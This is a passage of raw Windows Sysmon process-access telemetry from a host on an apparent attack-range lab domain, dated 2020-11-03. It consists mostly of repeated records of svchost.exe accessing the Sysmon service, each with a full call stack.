15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001510Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001509Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001508Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001507Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001506Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001505Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001504Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001503Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001502Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001501Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001500Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001499Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001498Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001497Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001496Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001495Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001494Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.106{D28789B6-7C62-5FA1-0A00-000000008801}852944C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-2D00-000000008801}2448C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.096{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001492Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.096{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001491Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.096{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001490Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.096{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001489Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.096{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001488Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.096{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001487Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.096{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdl